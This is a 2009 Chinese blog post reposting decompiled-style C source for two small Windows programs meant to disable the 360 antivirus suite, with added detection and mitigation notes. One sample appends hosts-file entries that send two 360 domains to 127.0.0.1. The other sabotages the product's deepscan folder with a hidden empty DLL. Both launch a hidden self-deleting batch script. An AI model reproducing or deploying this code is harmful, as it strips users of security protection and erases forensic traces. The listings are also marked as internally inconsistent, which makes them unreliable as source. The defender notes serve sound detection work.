
2个K掉360的代码

2009年9月19日

在JKS上看到的,代码如下:

ONE

/*
 * Sample ONE (decompiler-style listing, as posted).
 *
 * Behaviour shown: opens <system directory>\drivers\etc\hosts for writing,
 * seeks to the end, appends two lines that map stat.360safe.com and
 * qup.f.360.cn to 127.0.0.1, then calls sub_401000().
 *
 * Defender notes:
 *  - Effect on the host: lookups for those two names resolve to loopback.
 *    They look like vendor endpoints of the 360 product (the listing does
 *    not say what they serve - verify before relying on that).
 *  - Detection: file-integrity monitoring on the hosts file; alert when a
 *    process other than an expected admin tool opens it with write access;
 *    flag loopback entries that name security-vendor domains.
 *  - Mitigation: the append only succeeds if the process may write the
 *    hosts file, so least-privilege accounts and a restrictive ACL on the
 *    file limit it.
 *
 * NOTE(review): buffer sizes and the handle check in this listing are not
 * self-consistent (see inline notes). Read it as a description of
 * behaviour, not as faithful source.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char FileName[128];
/* Size argument is 0x104 (260) although FileName is declared as 128 bytes. */
GetSystemDirectoryA(FileName, 0x104u);
lstrcatA(FileName, "\\drivers\\etc\\hosts");
/* 0x40000000 = GENERIC_WRITE, share mode 0 (exclusive), 3 = OPEN_EXISTING,
   0x20 = FILE_ATTRIBUTE_ARCHIVE. */
HANDLE hFile = CreateFileA(FileName, 0x40000000, 0, 0, 3u, 0x20, 0);
/* As listed, this compares the path buffer, not hFile, with (HANDLE)-1. */
if ( FileName == (HANDLE)-1 )
ExitProcess(0);
/* Move method 2 = FILE_END: the write below is an append. */
if ( SetFilePointer(hFile, 0, 0, 2) != -1 )
{
DWORD NumberOfBytesWritten;
/* The appended text is the indicator to search hosts files for. */
WriteFile(hFile, "\r\n127.0.0.1 \tstat.360safe.com\r\n127.0.0.1 \tqup.f.360.cn", 0x35u, &NumberOfBytesWritten, 0);
}
CloseHandle(hFile);
/* Self-removal helper shared with sample TWO. */
sub_401000();
return 0;
}

TWO

/*
 * Sample TWO (decompiler-style listing, as posted).
 *
 * Behaviour shown: walks a process snapshot looking for "360tray.exe"
 * (case-insensitive), asks for that process's module path, changes the
 * current directory to the returned value, and then works with relative
 * paths: renames the "deepscan" directory, creates a new "deepscan"
 * directory, creates a hidden "deepscan\deepscan.dll" that nothing is
 * written to, and copies a fixed list of files back from the renamed
 * directory. It then calls sub_401000() and exits.
 *
 * Defender notes:
 *  - Effect as listed: the product's deepscan directory ends up with the
 *    listed files plus a freshly created deepscan.dll.
 *  - Detection: a non-vendor process opening the tray process with
 *    query/VM-read access and then renaming or creating files in the
 *    product's install directory; a zero-length or hidden DLL there; a
 *    renamed sibling directory holding the original files.
 *  - Mitigation: product self-protection (denying rename/create in its own
 *    directory to other processes) and least-privilege user accounts.
 *
 * NOTE(review): struct and buffer sizes below do not match the sizes passed
 * to the APIs, and the snapshot handle is never closed in this listing.
 * Treat it as a behavioural description rather than faithful source.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char PathName[512]={0};
PROCESSENTRY32 pe;
/* The listing hard-codes 128 for both the zeroing length and dwSize. */
RtlZeroMemory(&pe,128);
pe.dwSize=128;
/* Flag 2 = TH32CS_SNAPPROCESS: snapshot of all processes. */
HANDLE hSnapshot=CreateToolhelp32Snapshot(2,0);
BOOL v0=Process32First(hSnapshot,&pe);
while(v0)
{
/* lstrcmpi returns 0 on a case-insensitive match of the image name. */
if(!lstrcmpi(pe.szExeFile,"360tray.exe"))
{
/* 0x410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ. */
HANDLE hProcess=OpenProcess(0x410,0,pe.th32ProcessID);
if(hProcess)
{
/* Size argument is 0x4000 although PathName is declared as 512 bytes. */
if(GetModuleFileNameEx(hProcess,0,PathName,0x4000))
{
/* All paths that follow are relative to this directory change. */
SetCurrentDirectoryA(PathName);
MoveFileA("deepscan", "fuck");
CreateDirectoryA("deepscan", 0);
/* 0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS, attribute 2 =
   FILE_ATTRIBUTE_HIDDEN. The returned handle is neither stored nor closed. */
CreateFileA("deepscan\\deepscan.dll", 0x40000000u, 0, 0, 2u, 2u, 0);
/* Third argument is bFailIfExists: 1 for the first copy, 0 for the rest. */
CopyFileA("fuck\\360deepscan.exe", "deepscan\\360deepscan.exe", 1);
CopyFileA("fuck\\360FkAdv.sys", "deepscan\\360FkAdv.sys", 0);
CopyFileA("fuck\\360wservice.dll", "deepscan\\360wservice.dll", 0);
CopyFileA("fuck\\BREGDLL.dll", "deepscan\\BREGDLL.dll", 0);
CopyFileA("fuck\\BREGDRV.sys", "deepscan\\BREGDRV.sys", 0);
CopyFileA("fuck\\BREGDRV.sys.dat", "deepscan\\BREGDRV.sys.dat", 0);
CopyFileA("fuck\\cloudcom.dll", "deepscan\\cloudcom.dll", 0);
CopyFileA("fuck\\cloudsec.dll", "deepscan\\cloudsec.dll", 0);
CopyFileA("fuck\\FrontScan.dll", "deepscan\\FrontScan.dll", 0);
CopyFileA("fuck\\heavygate.dll", "deepscan\\heavygate.dll", 0);
CopyFileA("fuck\\libbsi.dat", "deepscan\\libbsi.dat", 0);
CopyFileA("fuck\\libbti.dat", "deepscan\\libbti.dat", 0);
}
}
/* Reached whether or not OpenProcess succeeded. */
CloseHandle(hProcess);
}
v0=Process32Next(hSnapshot, &pe);
}
/* Self-removal helper shared with sample ONE. */
sub_401000();
ExitProcess(0);
return 0;
}

公共函数(ONE 和 TWO 都会调用的 sub_401000)

/*
 * sub_401000 - self-removal helper called at the end of both samples
 * (decompiler output; the "// reg@n" and "[sp+..]" notes are the
 * decompiler's own annotations).
 *
 * Behaviour shown: builds the path <temp dir>DelUS.bat, creates that file,
 * fills a buffer with a batch script, writes it, and launches it with
 * ShellExecute using show command 0. The script text assembled below is:
 *
 *     :Repeat
 *     del "<path of this executable>"
 *     if exist "<path of this executable>" goto Repeat
 *     rmdir "<directory of this executable>"
 *     del "<path of the batch file>"
 *
 * Returns the result of HeapFree().
 *
 * Defender notes:
 *  - Detection: creation of DelUS.bat in the temp directory; a batch file
 *    with a del / "if exist ... goto" loop that targets its own parent
 *    executable; a command interpreter started with a hidden window by a
 *    short-lived process.
 *  - Forensics: the dropper removes itself and its directory, so evidence
 *    has to come from process-creation and file-system telemetry rather
 *    than from the file on disk.
 *
 * NOTE(review): the pointer arithmetic on the heap block, and the pointer
 * later passed to HeapFree, are as the decompiler rendered them and are not
 * self-consistent. Treat the listing as a behavioural description.
 */
BOOL __cdecl sub_401000()
{
LPSTR v0; // edx@2
LPSTR v1; // ecx@2
CHAR v2; // al@3
HANDLE v4; // eax@1
char *v5; // eax@1
HANDLE v6; // eax@1
int v7; // eax@6
HANDLE hHeap; // [sp+10h] [bp-Ch]@1
LPSTR lpMem; // [sp+8h] [bp-14h]@1
LPCH lpString2; // [sp+Ch] [bp-10h]@1
LPSTR lpFileName; // [sp+4h] [bp-18h]@1
LPCSTR lpBuffer; // [sp+0h] [bp-1Ch]@1
HANDLE hObject; // [sp+18h] [bp-4h]@1
DWORD NumberOfBytesWritten; // [sp+14h] [bp-8h]@6
v4 = GetProcessHeap();
hHeap = v4;
// One 0x7F8-byte heap block (flags 0) is carved into 260-byte slices;
// as listed, lpMem starts 260 bytes into the block.
v5 = (char *)HeapAlloc(v4, 0, 0x7F8) + 260;
lpMem = v5;
v5 += 260;
lpString2 = v5;
v5 += 260;
lpFileName = v5;
lpBuffer = v5 + 260;
// lpFileName = temp directory + "DelUS.bat" (fixed file-name indicator).
GetTempPathA(0x104, v5);
lstrcatA(lpFileName, "DelUS.bat");
// 0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS,
// 0x8000080 = FILE_FLAG_SEQUENTIAL_SCAN | FILE_ATTRIBUTE_NORMAL.
v6 = CreateFileA(lpFileName, 0x40000000, 0, 0, 2u, 0x8000080, 0);
hObject = v6;
if ( v6 != (HANDLE)-1 )
{
// lpString2 = full path of the running executable; lpMem = a copy of it.
GetModuleFileNameA(0, lpString2, 0x104);
lstrcpyA(lpMem, lpString2);
v0 = lpMem;
v1 = lpMem;
// Scan the copy for the last backslash (92 == '\\') ...
do
{
v2 = *v0;
if ( *v0 == 92 )
v1 = v0;
++v0;
}
while ( v2 );
// ... and terminate just after it, leaving the executable's directory.
*(v1 + 1) = 0;
// Assemble the batch text by appending to lpBuffer piece by piece.
lstrcatA((LPSTR)lpBuffer, ":Repeat\r\n");
lstrcatA((LPSTR)lpBuffer, "del \"");
lstrcatA((LPSTR)lpBuffer, lpString2);
lstrcatA((LPSTR)lpBuffer, "\"");
lstrcatA((LPSTR)lpBuffer, "\r\nif exist \"");
lstrcatA((LPSTR)lpBuffer, lpString2);
lstrcatA((LPSTR)lpBuffer, "\" goto Repeat\r\n");
lstrcatA((LPSTR)lpBuffer, "rmdir \"");
lstrcatA((LPSTR)lpBuffer, lpMem);
lstrcatA((LPSTR)lpBuffer, "\"\r\ndel \"");
lstrcatA((LPSTR)lpBuffer, lpFileName);
lstrcatA((LPSTR)lpBuffer, "\"\r\n");
v7 = lstrlenA(lpBuffer);
NumberOfBytesWritten = v7;
WriteFile(hObject, lpBuffer, v7, &NumberOfBytesWritten, 0);
CloseHandle(hObject);
// Final argument 0 = SW_HIDE: the batch file is opened without a visible window.
ShellExecute(0, "open", lpFileName, 0, 0, 0);
}
// As listed, the pointer freed is lpMem, not the address HeapAlloc returned.
return HeapFree(hHeap, 0, lpMem);
}
